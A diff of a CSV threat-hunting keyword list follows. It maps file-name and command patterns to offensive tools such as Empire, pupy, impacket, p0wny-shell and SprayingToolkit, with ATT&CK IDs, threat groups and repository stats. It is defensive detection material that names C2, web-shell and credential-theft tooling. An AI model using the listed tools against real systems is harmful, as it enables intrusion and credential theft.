- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" -"*Outflank-Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*OutlookEmailAbuse.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - 
TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Out-Minidump.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Outflank-Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*OutlookEmailAbuse.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*Out-Minidump.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*Out-ObfuscatedAst.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
 "*Out-ObfuscatedStringCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
 "*Out-ObfuscatedTokenCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
-"*output*kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
-"*Output.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*output*kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*Output.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*output/AccountsWithSPN.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
 "*output/AdminAccessComputers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
 "*output/AllDomainControllers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
@@ -14460,44 +14625,45 @@
 "*output/UsersPasswordMustChange.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
 "*output/UsersPasswordNotChanged.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
 "*output/WinRMMachines.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
-"*Out-RundllCommand*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
-"*OverrideLHOST 360.com*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z"
+"*Out-RundllCommand*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*OverrideLHOST 360.com*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z"
 "*owa */autodiscover/autodiscover.xml* --recon*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z"
 "*OWASP*Amass*","offensive_tool_keyword","amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","N/A","Information Gathering","https://github.com/caffix/amass","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*OwnerPersist-POST.*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*OwnerPersist-POST.*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
 "*Ox-Bruter.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
 "*-p 5000:5000 pador_vuln_server*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z"
 "*P0cL4bs*","offensive_tool_keyword","Github Username","github repo name hosting lots of exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/P0cL4bs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*p0dalirius/Coercer*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z"
-"*p0dalirius/Coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z"
-"*p0dalirius/ExtractBitlockerKeys*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z"
-"*p0dalirius/LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z"
+"*p0dalirius/Coercer*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z"
+"*p0dalirius/Coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*p0dalirius/ExtractBitlockerKeys*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z"
+"*p0dalirius/LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
 "*p0dalirius/pyLAPS*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z"
 "*p0f -i eth* -p*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*p0f/p0f.fp*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*p0wnedShell*","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","10","1488","363","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z"
-"*p0wny-shell*","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1578","620","2023-08-10T15:54:47Z","2016-11-09T20:41:01Z"
+"*p0wny-shell*","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1579","620","2023-08-10T15:54:47Z","2016-11-09T20:41:01Z"
 "*p3nt4/Nuages*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
 "*P4wnP1*","offensive_tool_keyword","P4wnP1","P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).","T1200 - T1056.001 - T1059.003 - T1547.001","TA0002 - TA0003 - TA0004","N/A","N/A","Network Exploitation tools","https://github.com/RoganDawes/P4wnP1","1","1","N/A","N/A","10","3768","667","2019-10-31T12:30:16Z","2017-02-22T14:34:09Z"
 "*P8CuaPrgwBjunvZxJcgq*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
-"*pack_py_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*pack_py_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*package externc2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
-"*package_cvs_into_lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
-"*package=impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*PackMyPayload.py*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
-"*PackMyPayload-master*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
